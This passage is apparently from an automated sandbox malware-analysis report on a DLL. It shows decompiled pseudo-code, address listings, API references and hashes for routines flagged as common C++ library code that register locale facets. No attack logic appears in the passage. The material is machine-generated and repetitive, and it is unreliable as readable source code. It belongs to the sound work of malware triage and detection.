							 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
							 *(_t110 - 0x10) = _t106;
							_t54 = E6E1E161C(0x6e2c6e24);
							_t89 =  *((intOrPtr*)(_t110 + 8));
							_t103 = E6E1E171B( *((intOrPtr*)(_t110 + 8)), _t54);
							__eflags = _t103;
							if(_t103 != 0) {
								L12:
								E6E2066BA(_t110 - 0x14);
								return E6E220075(_t103);
							} else {
								__eflags = _t106;
								if(_t106 == 0) {
									_push( *((intOrPtr*)(_t110 + 8)));
									_push(_t110 - 0x10);
									__eflags = E6E21C295(__ebx, _t89, __edx, _t103, _t106) - 0xffffffff;
									if(__eflags == 0) {
										_t93 = _t110 - 0x20;
										E6E1E1438(_t93);
										E6E223D74(_t110 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e26851f, _t79, _t103, _t106, 4);
										_t107 = _t93;
										 *(_t110 - 0x10) = _t107;
										 *((intOrPtr*)(_t107 + 4)) =  *((intOrPtr*)(_t110 + 0xc));
										_push( *((intOrPtr*)(_t110 + 0x14)));
										_t35 = _t110 - 4;
										 *_t35 =  *(_t110 - 4) & 0x00000000;
										__eflags =  *_t35;
										 *_t107 = 0x6e26c414;
										 *((char*)(_t107 + 0x28)) =  *((intOrPtr*)(_t110 + 0x10));
										E6E21D028(_t79, _t93, __edx, _t103, _t107,  *_t35);
										return E6E220075(_t107,  *((intOrPtr*)(_t110 + 8)));
									} else {
										_t103 =  *(_t110 - 0x10);
										 *(_t110 - 0x10) = _t103;
										 *(_t110 - 4) = 1;
										E6E206FD3(__eflags, _t103);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 4))))();
										 *0x6e2c6e44 = _t103;
										goto L12;
									}
								} else {
									_t103 = _t106;
									goto L12;
								}
							}
						} else {
							_t102 =  *(_t110 - 0x10);
							 *(_t110 - 0x10) = _t102;
							 *(_t110 - 4) = 1;
							E6E206FD3(__eflags, _t102);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 4))))();
							 *0x6e2c6e40 = _t102;
							goto L5;
						}
					} else {
						_t102 = _t105;
						goto L5;
					}
				}
			}












                          0x6e21bb30
                          0x6e21bb37
                          0x6e21bb41
                          0x6e21bb46
                          0x6e21bb51
                          0x6e21bb55
                          0x6e21bb58
                          0x6e21bb5d
                          0x6e21bb61
                          0x6e21bb66
                          0x6e21bb6a
                          0x6e21bbaf
                          0x6e21bbb2
                          0x6e21bbbe
                          0x6e21bb6c
                          0x6e21bb6e
                          0x6e21bb74
                          0x6e21bb7a
                          0x6e21bb82
                          0x6e21bb85
                          0x6e21bbc2
                          0x6e21bbd0
                          0x6e21bbd5
                          0x6e21bbdd
                          0x6e21bbe7
                          0x6e21bbec
                          0x6e21bbf7
                          0x6e21bbfb
                          0x6e21bbfe
                          0x6e21bc03
                          0x6e21bc0c
                          0x6e21bc0e
                          0x6e21bc10
                          0x6e21bc55
                          0x6e21bc58
                          0x6e21bc64
                          0x6e21bc12
                          0x6e21bc12
                          0x6e21bc14
                          0x6e21bc1a
                          0x6e21bc20
                          0x6e21bc28
                          0x6e21bc2b
                          0x6e21bc65
                          0x6e21bc68
                          0x6e21bc76
                          0x6e21bc7b
                          0x6e21bc83
                          0x6e21bc88
                          0x6e21bc8a
                          0x6e21bc90
                          0x6e21bc93
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bca0
                          0x6e21bca6
                          0x6e21bca9
                          0x6e21bcb5
                          0x6e21bc2d
                          0x6e21bc2d
                          0x6e21bc30
                          0x6e21bc34
                          0x6e21bc38
                          0x6e21bc45
                          0x6e21bc4d
                          0x6e21bc4f
                          0x00000000
                          0x6e21bc4f
                          0x6e21bc16
                          0x6e21bc16
                          0x00000000
                          0x6e21bc16
                          0x6e21bc14
                          0x6e21bb87
                          0x6e21bb87
                          0x6e21bb8a
                          0x6e21bb8e
                          0x6e21bb92
                          0x6e21bb9f
                          0x6e21bba7
                          0x6e21bba9
                          0x00000000
                          0x6e21bba9
                          0x6e21bb70
                          0x6e21bb70
                          0x00000000
                          0x6e21bb70
                          0x6e21bb6e

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21BB37
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E21BB41
                          • int.LIBCPMT ref: 6E21BB58
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E21BB92
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E21BBB2
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E21BBD0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID: n,n
                          • API String ID: 651022567-1342484985
                          • Opcode ID: 3fbef3bfdbbb79f7d8789ad5d990f5b111c051b872b6de22f359d1a50de2a0ca
                          • Instruction ID: 5837456fd597e2c1d6db6faa0fd0dad6903885155175de41ff1d125d22556f3b
                          • Opcode Fuzzy Hash: 3fbef3bfdbbb79f7d8789ad5d990f5b111c051b872b6de22f359d1a50de2a0ca
                          • Instruction Fuzzy Hash: E7110E79A0051ECBCF00EBE0C894AEDB7BBAF44B14F100919E511AB3D0DBB49B40C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E21BBD6, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 77%
                          			E6E21BBD6(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t55;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;

				_t48 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t66 - 0x14, 0);
				_t63 =  *0x6e2c6e44; // 0x0
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *((intOrPtr*)(_t66 - 0x10)) = _t63;
				_t27 = E6E1E161C(0x6e2c6e24);
				_t51 =  *((intOrPtr*)(_t66 + 8));
				_t28 = E6E1E171B( *((intOrPtr*)(_t66 + 8)), _t27);
				_t61 = _t28;
				if(_t28 != 0) {
					L5:
					E6E2066BA(_t66 - 0x14);
					return E6E220075(_t61);
				} else {
					if(_t63 == 0) {
						_push( *((intOrPtr*)(_t66 + 8)));
						_push(_t66 - 0x10);
						__eflags = E6E21C295(__ebx, _t51, __edx, _t61, _t63) - 0xffffffff;
						if(__eflags == 0) {
							_t55 = _t66 - 0x20;
							E6E1E1438(_t55);
							E6E223D74(_t66 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e26851f, __ebx, _t61, _t63, 4);
							_t64 = _t55;
							 *((intOrPtr*)(_t66 - 0x10)) = _t64;
							 *((intOrPtr*)(_t64 + 4)) =  *((intOrPtr*)(_t66 + 0xc));
							_push( *((intOrPtr*)(_t66 + 0x14)));
							_t21 = _t66 - 4;
							 *_t21 =  *(_t66 - 4) & 0x00000000;
							__eflags =  *_t21;
							 *_t64 = 0x6e26c414;
							 *((char*)(_t64 + 0x28)) =  *((intOrPtr*)(_t66 + 0x10));
							E6E21D028(_t48, _t55, __edx, _t61, _t64,  *_t21);
							return E6E220075(_t64,  *((intOrPtr*)(_t66 + 8)));
						} else {
							_t61 =  *((intOrPtr*)(_t66 - 0x10));
							 *((intOrPtr*)(_t66 - 0x10)) = _t61;
							 *(_t66 - 4) = 1;
							E6E206FD3(__eflags, _t61);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 4))))();
							 *0x6e2c6e44 = _t61;
							goto L5;
						}
					} else {
						_t61 = _t63;
						goto L5;
					}
				}
			}









                          0x6e21bbd6
                          0x6e21bbdd
                          0x6e21bbe7
                          0x6e21bbec
                          0x6e21bbf7
                          0x6e21bbfb
                          0x6e21bbfe
                          0x6e21bc03
                          0x6e21bc07
                          0x6e21bc0c
                          0x6e21bc10
                          0x6e21bc55
                          0x6e21bc58
                          0x6e21bc64
                          0x6e21bc12
                          0x6e21bc14
                          0x6e21bc1a
                          0x6e21bc20
                          0x6e21bc28
                          0x6e21bc2b
                          0x6e21bc65
                          0x6e21bc68
                          0x6e21bc76
                          0x6e21bc7b
                          0x6e21bc83
                          0x6e21bc88
                          0x6e21bc8a
                          0x6e21bc90
                          0x6e21bc93
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bc9c
                          0x6e21bca0
                          0x6e21bca6
                          0x6e21bca9
                          0x6e21bcb5
                          0x6e21bc2d
                          0x6e21bc2d
                          0x6e21bc30
                          0x6e21bc34
                          0x6e21bc38
                          0x6e21bc45
                          0x6e21bc4d
                          0x6e21bc4f
                          0x00000000
                          0x6e21bc4f
                          0x6e21bc16
                          0x6e21bc16
                          0x00000000
                          0x6e21bc16
                          0x6e21bc14

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E21BBDD
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E21BBE7
                          • int.LIBCPMT ref: 6E21BBFE
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E21BC38
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E21BC58
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E21BC76
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.492425402.000000006E2DC000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.493296071.000000006E2DD000.00000002.00020000.sdmp Download File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_6e1e0000_loaddll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
                          • String ID: $n,n
                          • API String ID: 651022567-3748013742
                          • Opcode ID: f2667d9cebe87ca965cd52e37b60528922298404a2dc1f437f81022640f2288e
                          • Instruction ID: a6547bb170d677b3cbd03c7a0d613a1b2f3d707285ca525e638e82ef695a7e22
                          • Opcode Fuzzy Hash: f2667d9cebe87ca965cd52e37b60528922298404a2dc1f437f81022640f2288e
                          • Instruction Fuzzy Hash: E2110E79A0052ECFCB00DBE4C898AEDB7BBAF84B04F140909E110AB390DFB49A40C791
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E20F8A5, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54COMMONLIBRARYCODE
                          Download Yara Rule
                          C-Code - Quality: 73%
                          			E6E20F8A5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t111;
				signed int _t112;
				void* _t124;
				void* _t137;
				void* _t150;
				void* _t163;
				void* _t176;
				void* _t189;
				signed int _t283;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				void* _t330;

				_t305 = __edx;
				_t234 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t330 - 0x14, 0);
				_t315 =  *0x6e2c6db0; // 0x0
				 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
				 *(_t330 - 0x10) = _t315;
				_t111 = E6E1E161C(0x6e2c6d64);
				_t237 =  *((intOrPtr*)(_t330 + 8));
				_t112 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t111);
				_t307 = _t112;
				if(_t112 != 0) {
					L5:
					E6E2066BA(_t330 - 0x14);
					return E6E220075(_t307);
				} else {
					if(_t315 == 0) {
						_push( *((intOrPtr*)(_t330 + 8)));
						_push(_t330 - 0x10);
						__eflags = E6E2113A1(__ebx, _t237, __edx, _t307, _t315) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t330 - 0x20);
							E6E223D74(_t330 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t307, _t315, 0x14);
							E6E206653(_t330 - 0x14, 0);
							_t316 =  *0x6e2c6ddc; // 0x0
							 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
							 *(_t330 - 0x10) = _t316;
							_t124 = E6E1E161C(0x6e2c6d88);
							_t244 =  *((intOrPtr*)(_t330 + 8));
							_t308 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t124);
							__eflags = _t308;
							if(_t308 != 0) {
								L12:
								E6E2066BA(_t330 - 0x14);
								return E6E220075(_t308);
							} else {
								__eflags = _t316;
								if(_t316 == 0) {
									_push( *((intOrPtr*)(_t330 + 8)));
									_push(_t330 - 0x10);
									__eflags = E6E211409(_t234, _t244, __edx, _t308, _t316) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t330 - 0x20);
										E6E223D74(_t330 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t234, _t308, _t316, 0x14);
										E6E206653(_t330 - 0x14, 0);
										_t317 =  *0x6e2c6de0; // 0x0
										 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
										 *(_t330 - 0x10) = _t317;
										_t137 = E6E1E161C(0x6e2c6d8c);
										_t251 =  *((intOrPtr*)(_t330 + 8));
										_t309 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t137);
										__eflags = _t309;
										if(_t309 != 0) {
											L19:
											E6E2066BA(_t330 - 0x14);
											return E6E220075(_t309);
										} else {
											__eflags = _t317;
											if(_t317 == 0) {
												_push( *((intOrPtr*)(_t330 + 8)));
												_push(_t330 - 0x10);
												__eflags = E6E211471(_t234, _t251, __edx, _t309, _t317) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t330 - 0x20);
													E6E223D74(_t330 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t234, _t309, _t317, 0x14);
													E6E206653(_t330 - 0x14, 0);
													_t318 =  *0x6e2c6dfc; // 0x0
													 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
													 *(_t330 - 0x10) = _t318;
													_t150 = E6E1E161C(0x6e2c6da8);
													_t258 =  *((intOrPtr*)(_t330 + 8));
													_t310 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t150);
													__eflags = _t310;
													if(_t310 != 0) {
														L26:
														E6E2066BA(_t330 - 0x14);
														return E6E220075(_t310);
													} else {
														__eflags = _t318;
														if(_t318 == 0) {
															_push( *((intOrPtr*)(_t330 + 8)));
															_push(_t330 - 0x10);
															__eflags = E6E2114EC(_t234, _t258, _t305, _t310, _t318) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t330 - 0x20);
																E6E223D74(_t330 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t234, _t310, _t318, 0x14);
																E6E206653(_t330 - 0x14, 0);
																_t319 =  *0x6e2c6dcc; // 0x0
																 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																 *(_t330 - 0x10) = _t319;
																_t163 = E6E1E161C(0x6e2c6d80);
																_t265 =  *((intOrPtr*)(_t330 + 8));
																_t311 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t163);
																__eflags = _t311;
																if(_t311 != 0) {
																	L33:
																	E6E2066BA(_t330 - 0x14);
																	return E6E220075(_t311);
																} else {
																	__eflags = _t319;
																	if(_t319 == 0) {
																		_push( *((intOrPtr*)(_t330 + 8)));
																		_push(_t330 - 0x10);
																		__eflags = E6E211558(_t234, _t265, _t305, _t311, _t319) - 0xffffffff;
																		if(__eflags == 0) {
																			E6E1E1438(_t330 - 0x20);
																			E6E223D74(_t330 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e2683cf, _t234, _t311, _t319, 0x14);
																			E6E206653(_t330 - 0x14, 0);
																			_t320 =  *0x6e2c6e00; // 0x0
																			 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																			 *(_t330 - 0x10) = _t320;
																			_t176 = E6E1E161C(0x6e2c6dac);
																			_t272 =  *((intOrPtr*)(_t330 + 8));
																			_t312 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t176);
																			__eflags = _t312;
																			if(_t312 != 0) {
																				L40:
																				E6E2066BA(_t330 - 0x14);
																				return E6E220075(_t312);
																			} else {
																				__eflags = _t320;
																				if(_t320 == 0) {
																					_push( *((intOrPtr*)(_t330 + 8)));
																					_push(_t330 - 0x10);
																					__eflags = E6E2115C4(_t234, _t272, _t305, _t312, _t320) - 0xffffffff;
																					if(__eflags == 0) {
																						E6E1E1438(_t330 - 0x20);
																						E6E223D74(_t330 - 0x20, 0x6e2c3504);
																						asm("int3");
																						E6E2200AC(0x6e2683cf, _t234, _t312, _t320, 0x14);
																						E6E206653(_t330 - 0x14, 0);
																						_t321 =  *0x6e2c6dd0; // 0x0
																						 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																						 *(_t330 - 0x10) = _t321;
																						_t189 = E6E1E161C(0x6e2c6d60);
																						_t279 =  *((intOrPtr*)(_t330 + 8));
																						_t313 = E6E1E171B( *((intOrPtr*)(_t330 + 8)), _t189);
																						__eflags = _t313;
																						if(_t313 != 0) {
																							L47:
																							E6E2066BA(_t330 - 0x14);
																							return E6E220075(_t313);
																						} else {
																							__eflags = _t321;
																							if(_t321 == 0) {
																								_push( *((intOrPtr*)(_t330 + 8)));
																								_push(_t330 - 0x10);
																								__eflags = E6E21162A(_t234, _t279, _t305, _t313, _t321) - 0xffffffff;
																								if(__eflags == 0) {
																									_t283 = _t330 - 0x20;
																									E6E1E1438(_t283);
																									E6E223D74(_t330 - 0x20, 0x6e2c3504);
																									asm("int3");
																									E6E2200AC(0x6e26851f, _t234, _t313, _t321, 4);
																									_t322 = _t283;
																									 *(_t330 - 0x10) = _t322;
																									 *((intOrPtr*)(_t322 + 4)) =  *((intOrPtr*)(_t330 + 0xc));
																									_push( *((intOrPtr*)(_t330 + 0x14)));
																									_t105 = _t330 - 4;
																									 *_t105 =  *(_t330 - 4) & 0x00000000;
																									__eflags =  *_t105;
																									 *_t322 = 0x6e26c0c4;
																									 *((char*)(_t322 + 0x28)) =  *((intOrPtr*)(_t330 + 0x10));
																									E6E21542F(_t234, _t283, _t305, _t313, _t322,  *_t105);
																									return E6E220075(_t322,  *((intOrPtr*)(_t330 + 8)));
																								} else {
																									_t313 =  *(_t330 - 0x10);
																									 *(_t330 - 0x10) = _t313;
																									 *(_t330 - 4) = 1;
																									E6E206FD3(__eflags, _t313);
																									 *0x6e26a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t313 + 4))))();
																									 *0x6e2c6dd0 = _t313;
																									goto L47;
																								}
																							} else {
																								_t313 = _t321;
																								goto L47;
																							}
																						}
																					} else {
																						_t312 =  *(_t330 - 0x10);
																						 *(_t330 - 0x10) = _t312;
																						 *(_t330 - 4) = 1;
																						E6E206FD3(__eflags, _t312);
																						 *0x6e26a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t312 + 4))))();
																						 *0x6e2c6e00 = _t312;
																						goto L40;
																					}
																				} else {
																					_t312 = _t320;
																					goto L40;
																				}
																			}
																		} else {
																			_t311 =  *(_t330 - 0x10);
																			 *(_t330 - 0x10) = _t311;
																			 *(_t330 - 4) = 1;
																			E6E206FD3(__eflags, _t311);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t311 + 4))))();
																			 *0x6e2c6dcc = _t311;
																			goto L33;
																		}
																	} else {
																		_t311 = _t319;
																		goto L33;
																	}
																}
															} else {
																_t310 =  *(_t330 - 0x10);
																 *(_t330 - 0x10) = _t310;
																 *(_t330 - 4) = 1;
																E6E206FD3(__eflags, _t310);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t310 + 4))))();
																 *0x6e2c6dfc = _t310;
																goto L26;
															}
														} else {
															_t310 = _t318;
															goto L26;
														}
													}
												} else {
													_t309 =  *(_t330 - 0x10);
													 *(_t330 - 0x10) = _t309;
													 *(_t330 - 4) = 1;
													E6E206FD3(__eflags, _t309);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
													 *0x6e2c6de0 = _t309;
													goto L19;
												}
											} else {
												_t309 = _t317;
												goto L19;
											}
										}
									} else {
										_t308 =  *(_t330 - 0x10);
										 *(_t330 - 0x10) = _t308;
										 *(_t330 - 4) = 1;
										E6E206FD3(__eflags, _t308);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
										 *0x6e2c6ddc = _t308;
										goto L12;
									}
								} else {
									_t308 = _t316;
									goto L12;
								}
							}
						} else {
							_t307 =  *(_t330 - 0x10);
							 *(_t330 - 0x10) = _t307;
							 *(_t330 - 4) = 1;
							E6E206FD3(__eflags, _t307);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t307 + 4))))();
							 *0x6e2c6db0 = _t307;
							goto L5;
						}
					} else {
						_t307 = _t315;
						goto L5;
					}
				}
			}



























                          0x6e20f8a5
                          0x6e20f8a5
                          0x6e20f8ac
                          0x6e20f8b6
                          0x6e20f8bb
                          0x6e20f8c6
                          0x6e20f8ca
                          0x6e20f8cd
                          0x6e20f8d2
                          0x6e20f8d6
                          0x6e20f8db
                          0x6e20f8df
                          0x6e20f924
                          0x6e20f927
                          0x6e20f933
                          0x6e20f8e1
                          0x6e20f8e3
                          0x6e20f8e9
                          0x6e20f8ef
                          0x6e20f8f7
                          0x6e20f8fa
                          0x6e20f937
                          0x6e20f945
                          0x6e20f94a
                          0x6e20f952
                          0x6e20f95c
                          0x6e20f961
                          0x6e20f96c
                          0x6e20f970
                          0x6e20f973
                          0x6e20f978
                          0x6e20f981
                          0x6e20f983
                          0x6e20f985
                          0x6e20f9ca
                          0x6e20f9cd
                          0x6e20f9d9
                          0x6e20f987
                          0x6e20f987
                          0x6e20f989
                          0x6e20f98f
                          0x6e20f995
                          0x6e20f99d
                          0x6e20f9a0
                          0x6e20f9dd
                          0x6e20f9eb
                          0x6e20f9f0
                          0x6e20f9f8
                          0x6e20fa02
                          0x6e20fa07
                          0x6e20fa12
                          0x6e20fa16
                          0x6e20fa19
                          0x6e20fa1e
                          0x6e20fa27
                          0x6e20fa29
                          0x6e20fa2b
                          0x6e20fa70
                          0x6e20fa73
                          0x6e20fa7f
                          0x6e20fa2d
                          0x6e20fa2d
                          0x6e20fa2f
                          0x6e20fa35
                          0x6e20fa3b
                          0x6e20fa43
                          0x6e20fa46
                          0x6e20fa83
                          0x6e20fa91
                          0x6e20fa96
                          0x6e20fa9e
                          0x6e20faa8
                          0x6e20faad
                          0x6e20fab8
                          0x6e20fabc
                          0x6e20fabf
                          0x6e20fac4
                          0x6e20facd
                          0x6e20facf
                          0x6e20fad1
                          0x6e20fb16
                          0x6e20fb19
                          0x6e20fb25
                          0x6e20fad3
                          0x6e20fad3
                          0x6e20fad5
                          0x6e20fadb
                          0x6e20fae1
                          0x6e20fae9
                          0x6e20faec
                          0x6e20fb29
                          0x6e20fb37
                          0x6e20fb3c
                          0x6e20fb44
                          0x6e20fb4e
                          0x6e20fb53
                          0x6e20fb5e
                          0x6e20fb62
                          0x6e20fb65
                          0x6e20fb6a
                          0x6e20fb73
                          0x6e20fb75
                          0x6e20fb77
                          0x6e20fbbc
                          0x6e20fbbf
                          0x6e20fbcb
                          0x6e20fb79
                          0x6e20fb79
                          0x6e20fb7b
                          0x6e20fb81
                          0x6e20fb87
                          0x6e20fb8f
                          0x6e20fb92
                          0x6e20fbcf
                          0x6e20fbdd
                          0x6e20fbe2
                          0x6e20fbea
                          0x6e20fbf4
                          0x6e20fbf9
                          0x6e20fc04
                          0x6e20fc08
                          0x6e20fc0b
                          0x6e20fc10
                          0x6e20fc19
                          0x6e20fc1b
                          0x6e20fc1d
                          0x6e20fc62
                          0x6e20fc65
                          0x6e20fc71
                          0x6e20fc1f
                          0x6e20fc1f
                          0x6e20fc21
                          0x6e20fc27
                          0x6e20fc2d
                          0x6e20fc35
                          0x6e20fc38
                          0x6e20fc75
                          0x6e20fc83
                          0x6e20fc88
                          0x6e20fc90
                          0x6e20fc9a
                          0x6e20fc9f
                          0x6e20fcaa
                          0x6e20fcae
                          0x6e20fcb1
                          0x6e20fcb6
                          0x6e20fcbf
                          0x6e20fcc1
                          0x6e20fcc3
                          0x6e20fd08
                          0x6e20fd0b
                          0x6e20fd17
                          0x6e20fcc5
                          0x6e20fcc5
                          0x6e20fcc7
                          0x6e20fccd
                          0x6e20fcd3
                          0x6e20fcdb
                          0x6e20fcde
                          0x6e20fd18
                          0x6e20fd1b
                          0x6e20fd29
                          0x6e20fd2e
                          0x6e20fd36
                          0x6e20fd3b
                          0x6e20fd3d
                          0x6e20fd43
                          0x6e20fd46
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd4f
                          0x6e20fd53
                          0x6e20fd59
                          0x6e20fd5c
                          0x6e20fd68
                          0x6e20fce0
                          0x6e20fce0
                          0x6e20fce3
                          0x6e20fce7
                          0x6e20fceb
                          0x6e20fcf8
                          0x6e20fd00
                          0x6e20fd02
                          0x00000000
                          0x6e20fd02
                          0x6e20fcc9
                          0x6e20fcc9
                          0x00000000
                          0x6e20fcc9
                          0x6e20fcc7
                          0x6e20fc3a
                          0x6e20fc3a
                          0x6e20fc3d
                          0x6e20fc41
                          0x6e20fc45
                          0x6e20fc52
                          0x6e20fc5a
                          0x6e20fc5c
                          0x00000000
                          0x6e20fc5c
                          0x6e20fc23
                          0x6e20fc23
                          0x00000000
                          0x6e20fc23
                          0x6e20fc21
                          0x6e20fb94
                          0x6e20fb94
                          0x6e20fb97
                          0x6e20fb9b
                          0x6e20fb9f
                          0x6e20fbac
                          0x6e20fbb4
                          0x6e20fbb6
                          0x00000000
                          0x6e20fbb6
                          0x6e20fb7d
                          0x6e20fb7d
                          0x00000000
                          0x6e20fb7d
                          0x6e20fb7b
                          0x6e20faee
                          0x6e20faee
                          0x6e20faf1
                          0x6e20faf5
                          0x6e20faf9
                          0x6e20fb06
                          0x6e20fb0e
                          0x6e20fb10
                          0x00000000
                          0x6e20fb10
                          0x6e20fad7
                          0x6e20fad7
                          0x00000000
                          0x6e20fad7
                          0x6e20fad5
                          0x6e20fa48
                          0x6e20fa48
                          0x6e20fa4b
                          0x6e20fa4f
                          0x6e20fa53
                          0x6e20fa60
                          0x6e20fa68
                          0x6e20fa6a
                          0x00000000
                          0x6e20fa6a
                          0x6e20fa31
                          0x6e20fa31
                          0x00000000
                          0x6e20fa31
                          0x6e20fa2f
                          0x6e20f9a2
                          0x6e20f9a2
                          0x6e20f9a5
                          0x6e20f9a9
                          0x6e20f9ad
                          0x6e20f9ba
                          0x6e20f9c2
                          0x6e20f9c4
                          0x00000000
                          0x6e20f9c4
                          0x6e20f98b
                          0x6e20f98b
                          0x00000000
                          0x6e20f98b
                          0x6e20f989
                          0x6e20f8fc
                          0x6e20f8fc
                          0x6e20f8ff
                          0x6e20f903
                          0x6e20f907
                          0x6e20f914
                          0x6e20f91c
                          0x6e20f91e
                          0x00000000
                          0x6e20f91e
                          0x6e20f8e5
                          0x6e20f8e5
                          0x00000000
                          0x6e20f8e5
                          0x6e20f8e3

                          APIs
                          • __EH_prolog3.LIBCMT ref: 6E20F8AC
                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E20F8B6
                          • int.LIBCPMT ref: 6E20F8CD
                            • Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
                            • Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647
                          • std::_Facet_Register.LIBCPMT ref: 6E20F907
                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F927
                          • __CxxThrowException@8.LIBVCRUNTIME ref: 6E20F945
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.490312079.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true
                          • Associated: 00000000.00000002.490308260.000000006E1E0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490375280.000000006E26A000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.490534264.000000006E2C5000.00000004.00020000.sdmp Download File
